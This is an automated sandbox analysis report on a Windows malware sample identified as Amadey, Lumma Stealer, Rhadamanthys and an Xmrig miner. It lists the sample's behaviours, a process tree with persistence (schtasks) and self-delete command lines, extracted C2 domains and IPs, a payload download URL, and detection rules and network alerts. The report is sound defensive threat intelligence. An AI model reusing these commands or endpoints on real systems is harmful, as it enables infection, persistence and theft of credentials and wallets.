Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1577291
MD5:65f41a5703887beeba49a84ca30bae19
SHA1:1ae160165e2ba85f3b90d34b451fe965ce51701e
SHA256:e99443934269e932c08bf7928da5ff5c5fae2cc72794380d5f7f7a2d0f7bc46e
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, LummaC Stealer, RHADAMANTHYS, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks if the current machine is a virtual machine (disk enumeration)
Contains functionality to inject code into remote processes
Drops password protected ZIP file
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Found strings related to Crypto-Mining
Hides threads from debuggers
Injects a PE file into a foreign processes
Injects code into the Windows Explorer (explorer.exe)
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the context of a thread in another process (thread injection)
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses cmd line tools excessively to alter registry or file data
Uses ping.exe to check the status of other devices and networks
Uses schtasks.exe or at.exe to add and modify task schedules
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Enables security privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6748 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 65F41A5703887BEEBA49A84CA30BAE19)
    • skotes.exe (PID: 6012 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 65F41A5703887BEEBA49A84CA30BAE19)
  • skotes.exe (PID: 6628 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 65F41A5703887BEEBA49A84CA30BAE19)
  • skotes.exe (PID: 1088 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 65F41A5703887BEEBA49A84CA30BAE19)
    • 5639a58f3b.exe (PID: 6596 cmdline: "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
      • conhost.exe (PID: 1208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 5639a58f3b.exe (PID: 340 cmdline: "C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exe" MD5: 8A9CB17C0224A01BD34B46495983C50A)
    • 850609077b.exe (PID: 2988 cmdline: "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 850609077b.exe (PID: 4196 cmdline: "C:\Users\user\AppData\Local\Temp\1016869001\850609077b.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
    • 7c1324dac5.exe (PID: 2328 cmdline: "C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 5776 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 6936 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
        • 7z.exe (PID: 3476 cmdline: 7z.exe e file.zip -p24291711423417250691697322505 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 1812 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 6836 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3384 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 5900 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 368 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 4144 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • 7z.exe (PID: 3960 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
        • attrib.exe (PID: 2736 cmdline: attrib +H "in.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
        • in.exe (PID: 6964 cmdline: "in.exe" MD5: 83D75087C9BF6E4F07C36E550731CCDE)
          • attrib.exe (PID: 6324 cmdline: attrib +H +S C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • attrib.exe (PID: 5052 cmdline: attrib +H C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
            • conhost.exe (PID: 7152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 7108 cmdline: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE MD5: 76CD6626DD8834BD4A42E6A565104DC2)
            • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6360 cmdline: powershell ping 127.0.0.1; del in.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
            • conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • PING.EXE (PID: 6224 cmdline: "C:\Windows\system32\PING.EXE" 127.0.0.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
    • 1459165c97.exe (PID: 948 cmdline: "C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe" MD5: 74C0FEC1D8D8E4C943BAED136DCF9E56)
      • svchost.exe (PID: 6472 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • WerFault.exe (PID: 1108 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 948 -s 648 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • Intel_PTT_EK_Recertification.exe (PID: 5740 cmdline: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe MD5: 83D75087C9BF6E4F07C36E550731CCDE)
    • explorer.exe (PID: 1048 cmdline: explorer.exe MD5: 662F4F92FDE3557E86D110526BB578D5)
    • powershell.exe (PID: 3548 cmdline: powershell ping 127.1.10.1; del Intel_PTT_EK_Recertification.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PING.EXE (PID: 6544 cmdline: "C:\Windows\system32\PING.EXE" 127.1.10.1 MD5: 2F46799D79D22AC72C241EC0322B011D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search user.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat", "grannyejh.lat", "pancakedipyps.click"], "Build id": "FATE99--test"}

Threatname: Rhadamanthys

{"C2 url": "https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000006.00000003.2820833506.0000000004C60000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        00000000.00000003.2131654122.0000000004E80000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
          00000025.00000002.3209344034.00000000011E9000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            00000000.00000002.2172859499.0000000000FB1000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
              0000002B.00000003.3326988369.00000000055F0000.00000004.00000001.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                Click to see the 32 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                43.3.svchost.exe.53d0000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                  42.3.1459165c97.exe.6050000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                    43.3.svchost.exe.53d0000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      43.3.svchost.exe.55f0000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        42.3.1459165c97.exe.5e30000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                          Click to see the 15 entries

                          Sigma Signatures

                          System Summary

                          barindex
                          Sigma detected: Suspicious Add Scheduled Task Parent
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 6964, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7108, ProcessName: schtasks.exe
                          Sigma detected: Suspicious Schtasks From Env Var Folder
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 6964, ParentProcessName: in.exe, ProcessCommandLine: schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE, ProcessId: 7108, ProcessName: schtasks.exe
                          Sigma detected: Uncommon Svchost Parent Process
                          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe, ParentProcessId: 948, ParentProcessName: 1459165c97.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6472, ProcessName: svchost.exe
                          Sigma detected: Non Interactive PowerShell Process Spawned
                          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell ping 127.0.0.1; del in.exe, CommandLine: powershell ping 127.0.0.1; del in.exe, CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "in.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\main\in.exe, ParentProcessId: 6964, ParentProcessName: in.exe, ProcessCommandLine: powershell ping 127.0.0.1; del in.exe, ProcessId: 6360, ProcessName: powershell.exe
                          Sigma detected: Windows Processes Suspicious Parent Directory
                          Source: Process startedAuthor: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exe, ParentProcessId: 948, ParentProcessName: 1459165c97.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6472, ProcessName: svchost.exe

                          Suricata Signatures

                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:18.796849+010020283713Unknown Traffic192.168.2.649895172.67.179.109443TCP
                          2024-12-18T11:09:24.917554+010020283713Unknown Traffic192.168.2.649913104.21.23.76443TCP
                          2024-12-18T11:09:27.591453+010020283713Unknown Traffic192.168.2.649919172.67.179.109443TCP
                          2024-12-18T11:09:30.798177+010020283713Unknown Traffic192.168.2.649929104.21.23.76443TCP
                          2024-12-18T11:09:42.876304+010020283713Unknown Traffic192.168.2.649959172.67.179.109443TCP
                          2024-12-18T11:09:46.023928+010020283713Unknown Traffic192.168.2.649971104.21.23.76443TCP
                          2024-12-18T11:09:50.491708+010020283713Unknown Traffic192.168.2.649980172.67.179.109443TCP
                          2024-12-18T11:09:58.015741+010020283713Unknown Traffic192.168.2.650000104.21.23.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:26.361720+010020546531A Network Trojan was detected192.168.2.649895172.67.179.109443TCP
                          2024-12-18T11:09:29.578095+010020546531A Network Trojan was detected192.168.2.649913104.21.23.76443TCP
                          2024-12-18T11:09:41.213302+010020546531A Network Trojan was detected192.168.2.649919172.67.179.109443TCP
                          2024-12-18T11:09:44.355879+010020546531A Network Trojan was detected192.168.2.649929104.21.23.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:26.361720+010020498361A Network Trojan was detected192.168.2.649895172.67.179.109443TCP
                          2024-12-18T11:09:29.578095+010020498361A Network Trojan was detected192.168.2.649913104.21.23.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:41.213302+010020498121A Network Trojan was detected192.168.2.649919172.67.179.109443TCP
                          2024-12-18T11:09:44.355879+010020498121A Network Trojan was detected192.168.2.649929104.21.23.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:18.796849+010020583651Domain Observed Used for C2 Detected192.168.2.649895172.67.179.109443TCP
                          2024-12-18T11:09:27.591453+010020583651Domain Observed Used for C2 Detected192.168.2.649919172.67.179.109443TCP
                          2024-12-18T11:09:42.876304+010020583651Domain Observed Used for C2 Detected192.168.2.649959172.67.179.109443TCP
                          2024-12-18T11:09:50.491708+010020583651Domain Observed Used for C2 Detected192.168.2.649980172.67.179.109443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:17.000758+010020446961A Network Trojan was detected192.168.2.649888185.215.113.4380TCP
                          2024-12-18T11:09:23.641530+010020446961A Network Trojan was detected192.168.2.649907185.215.113.4380TCP
                          2024-12-18T11:09:37.782805+010020446961A Network Trojan was detected192.168.2.649940185.215.113.4380TCP
                          2024-12-18T11:09:52.583400+010020446961A Network Trojan was detected192.168.2.649985185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:17.256337+010020583641Domain Observed Used for C2 Detected192.168.2.6545331.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:17.031543+010020583781Domain Observed Used for C2 Detected192.168.2.6520141.1.1.153UDP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:49.115738+010020480941Malware Command and Control Activity Detected192.168.2.649959172.67.179.109443TCP
                          2024-12-18T11:09:56.629562+010020480941Malware Command and Control Activity Detected192.168.2.649971104.21.23.76443TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:07.023758+010028561471A Network Trojan was detected192.168.2.649862185.215.113.4380TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:15.670084+010028561221A Network Trojan was detected185.215.113.4380192.168.2.649871TCP
                          2024-12-18T11:09:51.248301+010028561221A Network Trojan was detected185.215.113.4380192.168.2.649961TCP
                          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                          2024-12-18T11:09:11.447771+010028033053Unknown Traffic192.168.2.64987731.41.244.1180TCP
                          2024-12-18T11:09:18.448636+010028033053Unknown Traffic192.168.2.64989431.41.244.1180TCP
                          2024-12-18T11:09:25.083891+010028033053Unknown Traffic192.168.2.64991231.41.244.1180TCP
                          2024-12-18T11:09:45.288765+010028033053Unknown Traffic192.168.2.64996631.41.244.1180TCP

                          Joe Sandbox Signatures

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Antivirus / Scanner detection for submitted sample
                          Source: file.exeAvira: detected
                          Antivirus detection for URL or domain
                          Source: http://185.215.113.43/Zu7JuNko/index.php871001Avira URL Cloud: Label: malware
                          Source: http://31.41.244.11/files/dodo/random.exeAvira URL Cloud: Label: phishing
                          Antivirus detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAvira: detection malicious, Label: TR/Crypt.TPM.Gen
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeAvira: detection malicious, Label: HEUR/AGEN.1352802
                          Found malware configuration
                          Source: 00000006.00000003.2820833506.0000000004C60000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                          Source: 0000002A.00000003.3304162838.00000000057A8000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://198.251.84.107:9254/dc33e47f6acdb4eefe/ahbjmv76.0lxxe"}
                          Source: 13.2.850609077b.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["necklacebudi.lat", "rapeflowwj.lat", "sustainskelet.lat", "energyaffai.lat", "crosshuaht.lat", "discokeyus.lat", "aspecteirs.lat", "grannyejh.lat", "pancakedipyps.click"], "Build id": "FATE99--test"}
                          Multi AV Scanner detection for dropped file
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\random[1].exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeReversingLabs: Detection: 75%
                          Source: C:\Users\user\AppData\Local\Temp\1016870001\7c1324dac5.exeReversingLabs: Detection: 87%
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeReversingLabs: Detection: 66%
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeReversingLabs: Detection: 66%
                          Multi AV Scanner detection for submitted file
                          Source: file.exeReversingLabs: Detection: 52%
                          Source: file.exeVirustotal: Detection: 56%Perma Link
                          AI detected suspicious sample
                          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                          Machine Learning detection for dropped file
                          Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\main\extracted\in.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\1016871001\1459165c97.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeJoe Sandbox ML: detected
                          Machine Learning detection for sample
                          Source: file.exeJoe Sandbox ML: detected
                          Sample uses string decryption to hide its real strings
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sweepyribs.lat
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
                          Source: 0000000A.00000002.3380062657.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: yau6Na--6989783370
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00416124 CryptUnprotectData,10_2_00416124
                          Source: C:\Users\user\AppData\Local\Temp\1016868001\5639a58f3b.exeCode function: 10_2_00D9123B CryptContextAddRef,10_2_00D9123B

                          Bitcoin Miner

                          barindex
                          Yara detected Xmrig cryptocurrency miner
                          Source: Yara matchFile source: 37.2.explorer.exe.140000000.0.unpack, type: UNPACKEDPE
